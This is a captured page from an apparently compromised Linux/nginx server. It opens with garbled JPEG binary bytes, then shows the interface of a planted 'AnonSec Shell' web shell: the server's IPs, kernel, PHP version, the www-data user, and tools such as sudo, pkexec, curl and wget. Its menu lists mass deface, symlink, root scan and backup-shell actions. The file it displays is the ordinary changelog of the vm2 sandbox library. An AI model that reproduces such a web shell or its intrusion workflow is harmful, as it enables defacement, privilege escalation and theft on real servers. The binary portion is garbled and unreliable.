JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 104.21.79.64  /  Your IP : 104.23.197.31   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/node_modules/pm2/node_modules/vm2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/node_modules/pm2/node_modules/vm2/CHANGELOG.md
v3.9.9 (2022-02-24)
-------------------
[fix] Bump parser ECMA version to 2022.  

v3.9.8 (2022-02-16)
-------------------
[fix] Add function type check for arguments, caller, and callee property check (GeoffRen)  
[fix] Fix find best extension handler  

v3.9.7 (2022-02-10)
-------------------
[fix] Allow relative require from base script  
[fix] Fix issue with modules with exports clause in package JSON  
[fix] Added missing whitelist check before custom require  
[fix] Revert plain object toString behavior  
[fix] Root path check improved  

v3.9.6 (2022-02-08)
-------------------
[fix] Security fixes (XmiliaH)  

v3.9.5 (2021-10-17)
-------------------
[new] Editor config (aubelsb2)  
[fix] Fix for Promise.then breaking  
[fix] Fix for missing properties on CallSite  

v3.9.4 (2021-10-12)
-------------------
[new] Added strict option  
[fix] Security fixes (XmiliaH)  
[fix] Fixed bound function causes TypeError (XmiliaH)  
[fix] Allow extending of frozen objects  

v3.9.3 (2020-04-07)
-------------------
[fix] Security fixes  
[fix] Fixed problems when Promise object is deleted (XmiliaH)  
[fix] Fixed oversight that write ability can change on non configurable properties (XmiliaH)  
[fix] Support shebang as node does (XmiliaH)  
[fix] Property typos (Shigma)


v3.9.2 (2020-04-29)
-------------------
[new] Added NodeVM options to pass argv & env to process object (XmiliaH)  
[fix] Fixed breakouts in NodeVM (XmiliaH)  
[fix] Made async check more robust (XmiliaH)  

v3.9.1 (2020-03-29)
-------------------
[fix] Require helpers statically in main (XmiliaH)  
[fix] Fix for non-configurable property access (XmiliaH)  

v3.9.0 (2020-03-21)
-------------------
[new] Added vm.Script `lineOffset` and `columnOffset` options (azu)  
[new] Allow to specify a compiler per VMScript (XmiliaH)  
[new] Add option to disable async (XmiliaH)  
[new] Added allot of jsdoc (XmiliaH)  
[fix] Fix access to frozen or unconfigurable properties (XmiliaH)  
[fix] Double wrap Objects to prevent breakout via inspect (XmiliaH)  
[fix] Compile now compiles VM code (XmiliaH)  

v3.8.4 (2019-09-13)
-------------------
[fix] Do not allow precompiling VMScript (XmiliaH)  
[fix] Security fixes (XmiliaH)  

v3.8.3 (2019-07-31)
-------------------
[fix] Security fixes  

v3.8.2 (2019-06-13)
-------------------
[fix] toString() on builtin objects  

v3.8.1 (2019-05-02)
-------------------
[fix] Module resolver fixes  
[fix] require('events') works correctly in Node 12  
[fix] SyntaxError not being instanceOf Error  

v3.8.0 (2019-04-21)
-------------------
[new] Allow prohibiting access to eval/wasm in sandbox context  
[new] Allow transitive external dependencies in sandbox context (Idan Attias)  
[new] Allow using wildcards in module-names passed using the external attribute (Harel Moshe)  
[fix] Default to index.js when specified "main" does not exist (Harel Moshe)  
[fix] Security fixes  

v3.7.0 (2019-04-15)
-------------------
[new] Add require.resolve (Idan Attias)  
[new] Support multiple root paths (Idan Attias)  

v3.6.11 (2019-04-08)
-------------------
[fix] Contextification of EvalError and URIError  
[fix] Security fixes  

v3.6.10 (2019-01-28)
-------------------
[fix] Add missing console.debug function in NodeVM  
[fix] Security fixes  

v3.6.9 (2019-01-26)
-------------------
[fix] Security fixes  

v3.6.8 (2019-01-26)
-------------------
[fix] Security fixes  

v3.6.7 (2019-01-26)
-------------------
[fix] Security fixes  

v3.6.6 (2019-01-01)
-------------------
[fix] Security fixes  

v3.6.5 (2018-12-31)
-------------------
[fix] Security fixes  

v3.6.4 (2018-10-17)
-------------------
[fix] Added new to vmwerror when trying to load coffeescipt but can't (dotconnor)  
[fix] Add arguments to process.nextTick proxy (Patrick Engström)  

v3.6.3 (2018-08-06)
-------------------
[fix] Security fixes  

v3.6.2 (2018-07-05)
-------------------
[fix] Security fixes  

v3.6.1 (2018-06-27)
-------------------
[fix] Security fixes  

v3.6.0 (2018-05-11)
-------------------
[new] Support for custom source extensions  
[new] WIP support for disallowing Promise  
[fix] Prevent slow unsafe alloc for Buffers  
[fix] Refactors around defaults  
[fix] Types definition update  

v3.5.2 (2017-10-04)
-------------------
[fix] Prevent slow unsafe alloc for Buffers  

v3.5.1 (2017-10-04)
-------------------
[fix] Prevent unsafe alloc for Buffers  

v3.5.0 (2017-08-31)
-------------------
[new] Allow a custom compiler to recieve the filetype (Orta Therox)  
[new] Allow in-sandbox requires to also get called through the compiler (Orta Therox)  
[new] Support whitelisting modules inside a VM (Orta Therox)  
[new] Add TypeScript definition (Orta Therox)  

v3.4.0 (2017-03-28)
-------------------
[new] Added experimental VM.protect method  

v3.3.1 (2017-03-27)
-------------------
[new] Added VM.freeze method  

v3.2.0 (2017-02-10)
-------------------
[new] Added support for pre-compiled scripts via VMScript  

v3.1.0 (2016-09-03)
-------------------
[new] Added option wrapper (Alizain Feerasta)  

v3.0.1 (2016-07-20)
-------------------
Initial release  

Anon7 - 2022
AnonSec Team